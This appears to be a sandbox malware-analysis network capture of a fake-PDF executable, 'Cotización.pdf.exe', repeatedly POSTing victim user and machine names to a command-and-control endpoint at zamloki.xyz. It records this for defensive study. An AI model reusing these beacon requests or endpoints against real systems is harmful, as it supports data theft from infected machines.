                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    36192.168.2.349768104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:09.683984995 CEST1425OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:09.704201937 CEST1425OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:10.016499043 CEST1426INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:10 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8wI2KTri1DCvBu8jinf%2FetqYiLXuNfBnp63%2FfY8UfmhEgUnvEfs2UroIA73xNtPVBtlNKGtADefCQHaRWWpXxE8jqt%2FYHXEm35ch%2Bhs80GFOS3gcNOqucRUWpBYENQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f069e764ea3-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    37192.168.2.349769104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:10.247766972 CEST1427OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:10.265628099 CEST1427OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:10.555449963 CEST1428INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:10 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=02pNKRRY8XvUsutESEsY8YPMYKxgm4M8HJKWGkQW0i08lp%2FMTmWE21rwIOh3rDC4vtoLeaIojYJRWMCBCbIYJeZH8cc7vIdrw7ToERfGrTik38i4hZSp0O9NJzmGjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f0a1d562b59-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    38192.168.2.349770172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:10.821021080 CEST1429OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:10.841195107 CEST1429OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:11.103722095 CEST1430INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:11 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uZavGK1zZSfUirEO9gmX9rV1swXiNT%2BWzfo%2FgR7UKa5Hfd5AXT4QLZ3%2BU9KZCLkloKL64RMWUN4K7lrTttpikDIYp%2FeuF2Kx5QYoXGjgRzYy4gz58nqg%2FxnrqSshgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f0dbe5e2b7d-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    39192.168.2.349776172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:11.345000982 CEST1444OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:11.363692045 CEST1447OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:11.644579887 CEST1694INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:11 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K42DoQcI5Fws%2Bdo5Rq1VsW66TpuuLXqeyOLKbWzXPgLGHnTlwLu2DzspJ8fFktMI0Rzjv0QL0udAQzPyYEkwqGisSynYmh%2FGGyBMR%2BxZe6FjEeVrf7iIl%2F9cSxUo2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f10f8054e14-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Jul 21, 2021 17:02:11.645127058 CEST1697INData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    4192.168.2.349731172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:01:50.104839087 CEST1282OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:50.122829914 CEST1282OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:50.388648987 CEST1283INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YIGo1AmwvazIX6MbCgBTEJMQ4LZATw9qcfSYGsSPPwkVcJ5M72AptSPScE6oD6J%2F2%2FyUO6A7MxzM3rGLw3CpYz%2B%2B8V9G0qnS15FqaPqyQV9XvTYiL3egiSs%2FyZCIKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254e8c3c062b59-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    40192.168.2.349777172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:11.925400972 CEST5036OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:11.945297956 CEST5036OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:12.192439079 CEST5037INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:12 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F3ZHdzH8qoc4jCdShfOy8fnL0ftlr9kEaG%2BEMQOHjI69nQRYPCPUPhKO6aVMgguwZDP3ISUaryESVthaorBWtBlo80Un0zEmNMIUwPdXkBltlH%2BLFrVXwufEP8DGig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f149d6ac295-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    41192.168.2.349778172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:12.481129885 CEST5538OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:12.499186993 CEST5538OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:12.756139994 CEST5539INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:12 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W%2FsKICPhpl5fA%2FAdg6VoQ0%2B%2FGHIAddCczlrykwacZhMZ1FiE6wO0UXnc%2BkuPl%2B6hW%2FkqyaqcG3p4L6KbguZGWEAFGMP4c2ZiT%2FpvbZOy8CrFiYntbUsxkX5chhAFhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f181c841f4d-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    42192.168.2.349779172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:13.166939974 CEST5540OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:13.187946081 CEST5541OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:13.445174932 CEST5541INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:13 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=i2RJ3WVkJF9EgnBrD1Se4kOQ%2F51VvwM3x%2BoeXBP0CrNwFmZg0mu9wwZNPz2w20IHzJg4uRV5FhBjS%2BB3MbLgGv7c%2Fok14GNRa8fPwTKpic9ItomsaB2lU%2BYEJ%2BHC5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f1c6b9296b0-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    43192.168.2.349780172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:13.720335960 CEST5542OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:13.738449097 CEST5542OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:14.001080036 CEST5543INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:13 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oZKU5J2lr%2FFFxeLrOysW957Suec%2Fl8%2F6dAUlaop%2F%2FV7M7NyfDpkK81Y65Men3%2Bms2AKRP2srWXVXhwx7p9BF%2BzWYw2PD7SgUTcIdCsYfQdzip%2B1LRKIRaZ879oLuNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f1fd90ddfa5-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    44192.168.2.349781172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:14.234800100 CEST5544OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:14.257570028 CEST5544OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:14.504000902 CEST5545INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:14 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UcbVjCs%2F9eWnh%2FOobJZRen8SawOrdzI%2FDaEhqePAIkyxetOv3AEjewmMJOxFL8tIMi2yVUr8%2Fddfp2YDrBXbfRA0GT%2BTPrRenn19aktk2q3CqvtMu5Mkmt12gXU4%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f23091c536a-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    45192.168.2.349782104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:14.826379061 CEST5546OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:14.844070911 CEST5546OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:15.105043888 CEST5547INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:15 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SBjDBXwQBkEhAMTocSECGmTPwmZYMxMf2GdTu6CTUaWwRLQjpqLdOmnXOnGO4zU2W7VQUQfTHtnL7WLTpD4fg%2Fi0AgvmzNmXyNGvAX2aGt%2BRSQyyLk4S1rQUvILpQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f26bb5c4e07-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    46192.168.2.349783104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:15.344614983 CEST5548OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:15.365585089 CEST5548OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:15.613753080 CEST5549INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:15 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BiLblw96s%2BpJCgBzp5EqrmEI52XmCjnycVwEvVzGG4dimzw1Z5NkqaHFy8KNCmZ0I2jZDooedrmopL7O3Q0kC2wusQ%2FuWpC52R8ozjafg56qhUaPizPy8ykmeskofQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f29fc3e325c-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    47192.168.2.349784172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:15.887511969 CEST5550OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:15.905441999 CEST5550OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:16.152909994 CEST5551INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:16 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3Mqjss8YMwii3fpFXWDyiKf3GpbVJI9XfCVi7G79hpE7zS5cG5VYUGEt%2FDreKne6u0qSLVWf5q8qFNA1AULfnUKLdakK%2B1KTFHKMYcD9V5NykAmTTs3wSovWfUd48w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f2d59dc4eb5-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    48192.168.2.349785172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:16.407556057 CEST5552OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:16.428200960 CEST5552OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:16.737401962 CEST5553INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:16 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
